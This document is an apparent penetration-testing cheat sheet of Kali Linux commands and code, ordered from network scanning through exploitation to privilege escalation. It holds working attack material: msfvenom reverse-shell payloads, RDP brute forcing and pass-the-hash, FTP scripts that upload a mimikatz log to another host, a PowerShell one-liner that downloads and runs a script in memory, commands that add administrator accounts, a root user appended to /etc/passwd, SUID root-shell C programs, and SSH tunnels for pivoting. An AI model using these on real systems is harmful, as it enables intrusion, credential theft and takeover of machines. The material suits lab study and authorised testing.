The tools used here are available in Kali Linux.
TCP network scan, top 100 ports
nmap -nv -sT --top-ports=100 -oA nmap-tcp-top100 192.168.0.0/24
TCP network scan, top 100 ports with OS discovery
nmap -nv -sTV -O --top-ports=100 -oA nmap-tcp-top100 192.168.0.0/24
TCP host scan, all ports with OS discovery
nmap -Pn -sT -O -p- -oA nmap-tcp-all 192.168.0.20
NBT name scan
nbtscan 192.168.0.20
nbtscan 192.168.0.0/24
SNMP scan
nmap -sU -p161,162 10.11.1.0/24 -oA nmap-snmp-scan
onesixtyone 192.168.0.20
onesixtyone -i snmp-hosts.txt -c /usr/share/doc/onesixtyone/dict.txt
snmpenum 192.168.0.20 public windows.txt
Check for anonymous FTP access
nmap -p21 --script=ftp-anon 192.168.0.20
Start a local FTP server on port 21 with anonymous access to files in the current directory
sudo apt install python3-pyftpdlib
sudo python3 -m pyftpdlib -w -p 21
FTP script for the Windows command line to download further tools
echo open 192.168.0.20 > ftpscript.txt
echo USER anonymous >> ftpscript.txt
echo anonymous >> ftpscript.txt
echo binary >> ftpscript.txt
echo get PsExec.exe >> ftpscript.txt
echo bye >> ftpscript.txt
ftp -v -n -s:ftpscript.txt
FTP script to upload data to your host
echo open 192.168.0.20 > ftpscript.txt
echo USER anonymous >> ftpscript.txt
echo anonymous >> ftpscript.txt
echo put mimikatz.log >> ftpscript.txt
echo bye >> ftpscript.txt
ftp -v -n -s:ftpscript.txt
Nikto scan
nikto -host 192.168.0.20
nikto -ssl -host 192.168.0.20:443
Directory scan
dirb http://192.168.0.20/ /usr/share/wordlists/dirb/big.txt
gobuster dir -u http://192.168.0.20/ -w /usr/share/wordlists/dirb/big.txt
Start an HTTP server on port 80, serving files from the current directory
sudo python -m SimpleHTTPServer 80
Scan for known SMB vulnerabilities
nmap -p139,445 --script smb-vuln-* 192.168.0.20
List available shares without providing any user credentials
smbclient -L //192.168.0.20 -N
List shares which are available for user Peter
smbclient -L //192.168.0.20 -U 'Peter'
Connect to share wwwroot
smbclient //192.168.0.20/wwwroot -N
smbclient //192.168.0.20/wwwroot -U 'Peter'
MS SQL database info
nmap -nv -Pn -p27900 --script=ms-sql-info --script-args mssql.username=user,mssql.password=password,mssql.instance-name=mydb 192.168.0.20
Connect to the DB
sqsh -S 192.168.0.20 -U username -P password
mssqlclient.py user:password@192.168.0.20 -db mydb -port 27900
Connect to a host using xfreerdp
xfreerdp /u:mydomain\\peter /p:password /v:192.168.0.20
Share a local folder with the remote host
rdesktop -u peter -p password -r disk:shared=/home/kali/shared 192.168.0.20
Pass the hash using xfreerdp
xfreerdp /u:domain\\user /pth:HASH /v:192.168.0.20
Brute-force RDP credentials
crowbar -b rdp -s 192.168.0.20/32 -U usernames_file -C passwords_file
Check for RealVNC 4.1.0 - 4.1.1 Authentication Bypass
nmap -p5800,5900 --script realvnc-auth-bypass 192.168.0.20
Create a WAR file with a reverse shell payload
msfvenom -p java/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f war > revshell.war
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f war > revshell.war
Create an ASP file with a reverse shell payload
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f asp > reverse.asp
Generate reverse shell shellcode in JavaScript (little-endian) format
msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f js_le
Scan WordPress for known vulnerabilities
wpscan --url http://192.168.0.20/wp/
Crack retrieved password hashes
hashcat -m 400 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
Basic Windows system information
systeminfo
List network adapters and IP addresses
ipconfig /all
List open ports and active service connections
netstat -ano
User information, groups, privileges
whoami
whoami /groups
whoami /priv
net user
net user /domain
net user peter
net localgroup
Show ACL information for a folder
icacls "C:\Program Files"
List services, their paths, start mode and privileges
wmic service get name,displayname,pathname,startmode,startname
wmic service get name,displayname,pathname,startmode,startname | findstr /i "auto" | findstr /i /v "C:\Windows"
List installed software, vendors and version numbers
wmic product get name,version,vendor
List drivers installed on the system
driverquery /v
Add a new user
net user peter password /add
Add user to a group
net localgroup Administrators peter /add
net localgroup "Remote Desktop Users" peter /add
From an Administrator shell to NT AUTHORITY\SYSTEM
PsExec.exe -i -s cmd.exe
Download a PowerShell script and execute it in memory without storing the script on the host
powershell -c "iex (New-Object Net.WebClient).DownloadString('http://192.168.0.1/Invoke-Kerberoast.ps1'); Invoke-Kerberoast"
Upgrade a non-interactive reverse shell to an interactive TTY
python -c 'import pty; pty.spawn("/bin/bash")'
If /etc/passwd is writable, add a new user with root privileges
openssl passwd -1 password
$1$7RaNk8Qt$vIvEmA/ylE5Rg7t1sDvrG0
openssl passwd -6 -salt peter password
$6$peter$cJk9H5n3n4dmdYqyEvDqTCgvR8AGc.qHoewCOuSWo1ufYi67/qmQtE6bM165j6QQv7qFBiB9pFoTWSgyVTU6Z.
echo 'peter:$6$peter$cJk9H5n3n4dmdYqyEvDqTCgvR8AGc.qHoewCOuSWo1ufYi67/qmQtE6bM165j6QQv7qFBiB9pFoTWSgyVTU6Z.:0:0:peter:/root:/bin/bash' >> /etc/passwd
Sample C program to add a new user. Useful if it is possible to run a program from the root context.
#include <stdio.h>

int main(void) {
    /* Append a UID 0 entry to /etc/passwd; fails unless the process can write the file */
    FILE *pfile = fopen("/etc/passwd", "a");
    if (pfile == NULL) {
        perror("fopen");
        return 1;
    }
    fprintf(pfile, "%s", "peter:$6$peter$cJk9H5n3n4dmdYqyEvDqTCgvR8AGc.qHoewCOuSWo1ufYi67/qmQtE6bM165j6QQv7qFBiB9pFoTWSgyVTU6Z.:0:0:peter:/root:/bin/bash\n");
    fclose(pfile);
    return 0;
}
Sample SUID program to execute a root shell
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(void) {
    /* Set real and effective IDs to root so the spawned shell keeps the privileges */
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
Set the SUID bit and ownership for an executable
chown root:root /tmp/program
chmod u+s /tmp/program
Remote port forwarding in Linux with SSH
ssh -oStrictHostKeyChecking=no -f -N -p 22 -R 9090:127.0.0.1:8080 kali@192.168.0.10 -i id_rsa
Remote port forwarding in Windows with plink.exe
plink.exe -v -ssh -P 22 -R 9090:127.0.0.1:8080 kali@192.168.0.10 -pw kali
Dynamic port forwarding in Linux with SSH
ssh -D 1080 kali@192.168.0.10
A simple wget alternative in Python 3 to download files when wget is not available
import sys
import urllib.request

url = sys.argv[1]
# Use the last path component of the URL as the local file name
filename = url.split("/")[-1]
with urllib.request.urlopen(url) as response:
    data = response.read()
# Write the raw bytes so binary files are not corrupted
with open(filename, "wb") as target_file:
    target_file.write(data)